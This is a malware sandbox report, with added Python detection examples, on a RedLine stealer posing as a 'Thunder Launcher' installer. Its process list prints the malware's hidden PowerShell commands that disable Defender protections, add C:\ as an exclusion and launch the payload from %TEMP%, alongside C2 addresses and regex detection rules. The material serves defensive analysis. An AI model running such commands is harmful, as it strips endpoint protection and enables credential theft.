Analysis Overview
Threat Level: Known bad
The submitted URL https://goo.su/xQHo (a shortened link opened in Microsoft Edge) was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-14 14:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 14:33
Reported
2024-07-14 14:37
Platform
win10v2004-20240709-en
Max time kernel
96s
Max time network
204s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1720967645459.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1636 set thread context of 4652 | N/A | C:\Users\Admin\AppData\Local\Temp\1720967645459.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe
"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"
C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe
"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe"'}"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe
C:\Users\Admin\AppData\Local\Temp\1720967645459.exe
"C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
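The process list above is the whole defence-evasion chain in order. Four hidden PowerShell launchers each request elevation with -Verb RunAs (a UAC prompt, not a UAC bypass); the elevated children add C:\ as a Defender exclusion and switch off behaviour monitoring, IOAV (download/attachment scanning) and real-time monitoring (ATT&CK T1562.001 via T1059.001); the downloaded executable is then started from %TEMP% and RegAsm.exe is launched with no assembly to register, which is the process into which PID 1636 sets the thread context of PID 4652 (the SetThreadContext signature, T1055.012). Whether the Set-MpPreference calls succeeded is not recorded here; on a host with Defender Tamper Protection enabled they are refused, and each attempt is logged as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational channel. The Python below is an added example, not output or code from the sandbox, that runs the command lines copied from this section through the four pattern checks an analyst would write for this chain; the rule names, regular expressions and the benign RegAsm contrast line are this example's own.

```python
"""Pattern checks for the Defender-tampering / process-hollowing chain shown in
the Processes section.  Added example: the command lines are copied from the
report; the rule names and the regular expressions are this example's own."""
import re

# Command lines copied from the report's Processes section (constructed sample input).
PROCESSES = [
    # Browser opens the shortened link that starts the chain; a COM surrogate for contrast.
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo',
    r'C:\Windows\System32\CompPkgSrv.exe -Embedding',
    r'"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"',
    # Four hidden launchers, each asking for elevation (UAC prompt) to change one Defender setting.
    'Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden '
    "-ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\\' -Verb RunAs}\"",
    'Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden '
    "-ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}\"",
    'Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden '
    "-ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}\"",
    'Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden '
    "-ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}\"",
    # The elevated children that actually apply the changes.
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring',
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\\',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection',
    # Payload started from %TEMP% (the "\/" in the path is the malware's own, kept verbatim).
    'Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden '
    '-ArgumentList \'-Command Start-Process "C:\\Users\\Admin\\AppData\\Local\\Temp\\/1720967645459.exe"\'}"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe',
    r'"C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"',
    # RegAsm.exe with nothing to register: the host process for the injected payload.
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
]

# Rule names are this example's own; ATT&CK technique IDs in the comments.
RULES = {
    # T1562.001: Set-/Add-MpPreference switching a protection off or adding an exclusion.
    "defender_tamper": re.compile(
        r"(?:Set|Add)-MpPreference\b.*?(?:-Disable\w+|-ExclusionPath)", re.I),
    # Hidden window plus -Verb RunAs: an elevation request that pops a UAC prompt.
    "hidden_elevated_powershell": re.compile(
        r"Start-Process\b.*?-WindowStyle\s+hidden\b.*?-Verb\s+RunAs", re.I),
    # Executable referenced under the user's Temp directory.
    "exec_from_temp": re.compile(r"\\AppData\\Local\\Temp\\", re.I),
    # T1055.012 hint: RegAsm.exe launched bare; legitimate use names an assembly to register.
    "regasm_no_args": re.compile(
        r'^"?[A-Za-z]:\\Windows\\Microsoft\.NET\\Framework(?:64)?\\v[\d.]+\\RegAsm\.exe"?\s*$', re.I),
}


def triage(cmdlines):
    """Map each rule name to the command lines it matched."""
    hits = {name: [] for name in RULES}
    for cmd in cmdlines:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits[name].append(cmd)
    return hits


def triggered(hits):
    """Rule names with at least one match, in rule-table order."""
    return [name for name in RULES if hits[name]]


if __name__ == "__main__":
    for name, cmds in triage(PROCESSES).items():
        print(f"{name}: {len(cmds)} hit(s)")
```

On a real endpoint the same checks apply to Sysmon Event ID 1 or Security 4688 command lines (with command-line auditing on); PowerShell script-block logging (Event ID 4104) records the inner Set-MpPreference text even when the outer launcher is obfuscated, which this sample did not bother to do. The bare-RegAsm rule is quiet in practice because RegAsm.exe is almost always invoked with an assembly path, so a hit deserves a look at the parent process, here an executable in %TEMP%.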
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | goo.su | udp |
| US | 172.67.139.105:443 | goo.su | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 105.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 145.77.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| DE | 88.198.89.4:80 | 88.198.89.4 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 4.89.198.88.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | o0.u2024.icu | udp |
| FI | 95.217.245.123:443 | o0.u2024.icu | tcp |
| US | 8.8.8.8:53 | 123.245.217.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
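Most rows in the Network table are resolver chatter: forward DNS to 8.8.8.8, the reverse (in-addr.arpa) lookups the sandbox itself performs on every address it sees, and link-local mDNS. What remains is six endpoints, two of which are plain HTTP to bare IPs with no hostname at all (77.91.77.145:80, contacted four times, and 88.198.89.4:80); the rest are TLS to goo.su, cdn.discordapp.com, t.me and o0.u2024.icu. The Python below is an added example, not part of the report, that parses the table as a pipe table, drops the noise, de-duplicates and ranks what is left; it also tolerates a row whose empty Domain cell has shifted the Proto value one column left (the mDNS row appears that way in the raw report). The scoring weights and the defang helper are this example's own.

```python
"""Turn the report's Network table into a ranked list of external endpoints.
Added example, not part of the sandbox output; rows are copied from the table."""
from collections import OrderedDict

# Copied from the report's Network table (constructed sample input; the mDNS row
# is kept as printed in the raw report, its empty Domain cell shifting Proto left).
NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | goo.su | udp |
| US | 172.67.139.105:443 | goo.su | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| US | 8.8.8.8:53 | 145.77.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 77.91.77.145:80 | 77.91.77.145 | tcp |
| DE | 88.198.89.4:80 | 88.198.89.4 | tcp |
| US | 8.8.8.8:53 | o0.u2024.icu | udp |
| FI | 95.217.245.123:443 | o0.u2024.icu | tcp |
"""

RESOLVER = "8.8.8.8:53"        # the sandbox's DNS server
MDNS = "224.0.0.251:5353"      # link-local multicast DNS
PROTOS = {"tcp", "udp"}


def parse_rows(table):
    """Parse the pipe table, repairing rows whose empty Domain cell shifted Proto left."""
    rows = []
    for line in table.strip().splitlines()[1:]:          # skip the header row
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        if domain.lower() in PROTOS and proto == "":     # shifted row: "| udp | |"
            domain, proto = "", domain
        rows.append({"country": country, "dest": dest,
                     "domain": domain or None, "proto": proto.lower()})
    return rows


def is_noise(row):
    """Resolver traffic, the sandbox's own PTR lookups and mDNS carry no C2 signal."""
    return (row["dest"] == RESOLVER or row["dest"] == MDNS
            or (row["domain"] or "").endswith(".in-addr.arpa"))


def extract_iocs(table):
    """Unique external endpoints, most suspicious first (scoring is this example's own)."""
    seen = OrderedDict()
    for row in parse_rows(table):
        if not is_noise(row):
            seen.setdefault((row["dest"], row["domain"]), row)
    iocs = list(seen.values())
    for r in iocs:
        host, port = r["dest"].rsplit(":", 1)
        r["bare_ip"] = r["domain"] == host              # no hostname involved at all
        r["score"] = (2 if r["bare_ip"] else 0) + (1 if port == "80" else 0)
    iocs.sort(key=lambda r: -r["score"])               # stable: table order within a score
    return iocs


def defang(s):
    """Make an indicator safe to paste into a ticket or chat."""
    return s.replace(".", "[.]").replace("http", "hxxp")


if __name__ == "__main__":
    for r in extract_iocs(NETWORK_TABLE):
        print(f'{r["score"]}  {r["country"]:3} {defang(r["dest"]):24} {defang(r["domain"])}')
```

Two caveats when turning this list into blocks or hunts. The table records only that each host was contacted, not what was transferred, so the HTTP sessions to the two bare IPs and the fetch from cdn.discordapp.com (which precedes the appearance of 1720967645459.exe in %TEMP%) are inferred, not shown. And goo.su, cdn.discordapp.com and t.me are legitimate services that are routinely abused to host payloads or hold C2 configuration; hunt on the hostname or full URL, not on their 172.67.x / 162.159.x addresses, which are shared Cloudflare edge IPs.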
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1790c766c15938258a4f9b984cf68312 |
| SHA1 | 15c9827d278d28b23a8ea0389d42fa87e404359f |
| SHA256 | 2e3978bb58c701f3c6b05de9349b7334a194591bec7bcf73f53527dc0991dc63 |
| SHA512 | 2682d9c60c9d67608cf140b6ca4958d890bcbc3c8a8e95fcc639d2a11bb0ec348ca55ae99a5840e1f50e5c5bcf3e27c97fc877582d869d98cc4ea3448315aafb |
\??\pipe\LOCAL\crashpad_4408_GBKPOKGKNHNKOIUH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8dc45b70cbe29a357e2c376a0c2b751b |
| SHA1 | 25d623cea817f86b8427db53b82340410c1489b2 |
| SHA256 | 511cfb6bedbad2530b5cc5538b6ec2184fc4f85947ba4c8166d0bb9f5fe2703a |
| SHA512 | 3ce0f52675feb16d6e62aae1c50767da178b93bdae28bacf6df3a2f72b8cc75b09c5092d9065e0872e5d09fd9ffe0c6931d6ae1943ddb1927b85d60659ef866e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 766815394ec267c2326059e3dbc23cd5 |
| SHA1 | f1f0fe419b29305a631c7591d0f376bf7c1cee80 |
| SHA256 | a6f370ab89678b2f7a172ae05007c8cf9fc3491f6fab1890bb3e0d7491db08d7 |
| SHA512 | cf764847de9d9696ac99439f71890431dee815821304117a78b8549d71e69effbfd822aa2767087eae335201e529c52ebac99d1fcc04947a46527b9a5b6b11bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8f34b4bb777c1a0986c47a9a997f9c90 |
| SHA1 | f35b2fa6873ec2ff50be5bebb949acf2064602f7 |
| SHA256 | ab9772ed963566e5f085686165a6e5f4901d2de6c5c3024571c77df51bb9737e |
| SHA512 | 327f683487c1a8672b311979fa05cec0d9b690ad965dde3d1e550e8073763b6c2ce9997867154b9492f5a384178594be200a0d9d301708c71867ee480b61e5b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2b4cbab8701d4200290de14bbe77e77e |
| SHA1 | 561dcd7361045ed84248bb3ce031934ece40ed09 |
| SHA256 | d5cefbef2dfcfbbb7a2feb72351bdbd2a6f12ecc90e349da745089202c9ae8f1 |
| SHA512 | f66d1bb75f737fe47608b48f4e82c1c73961d70e9ce9cf7338d5ba653109a82863c135ac5979c19818e415989571193726ca31e4cfabae60cd0e23321a9334c4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5b77ea6614486fa9082661f1f7d37c27 |
| SHA1 | 6e51bf491e35a6659694e62ca8dd27cdc30c8d2a |
| SHA256 | da899b1ce0fc127cdacfe489d2dc211eb94cefa71cf87ed849697fa43194acdb |
| SHA512 | c672ca111f9c50e7a15ca6153c46aab6f07e701dda225c4490e637e74322a89e53b49d267a71a13aaf5e309b21dc9e0328e7b1aac1565fe6085a5984b8768f9c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 06e4538e1224a04a8a3763fd371bc44a |
| SHA1 | 89444b13d31eda3780050e1aea12c902a5e723d2 |
| SHA256 | 36dc28b1f8b3de65b761150c373fbe441868b97d81e7b55c263735e1b6d20126 |
| SHA512 | e35a762d413aec5b6de7e6c658dd41daa28c2513bcd6a360306b0d6512c7dffa083ea4bd37b215d4fc78287eb33a33e953af029263f75874d40019eecc50513d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | f59173bd6bae4225216d91afe48b6017 |
| SHA1 | 9231eee8b25e96dcc0d58267cab3cc12130b82d9 |
| SHA256 | 00f46a4416df2f1d9af4fdf0fe9765ae0fa62fa34c590243b002da927d1ba9dc |
| SHA512 | c17a4d40f409dc874fd77b0e9fff36602fb7cc640868ee877a12819e01169fac3a15fdf21a9d06a128c2352046c6d9545b51544b7997c2123a9d2c8bac88cc7b |
memory/2316-155-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4348-185-0x0000000002D10000-0x0000000002D11000-memory.dmp
memory/4348-193-0x0000000002D10000-0x0000000002D11000-memory.dmp
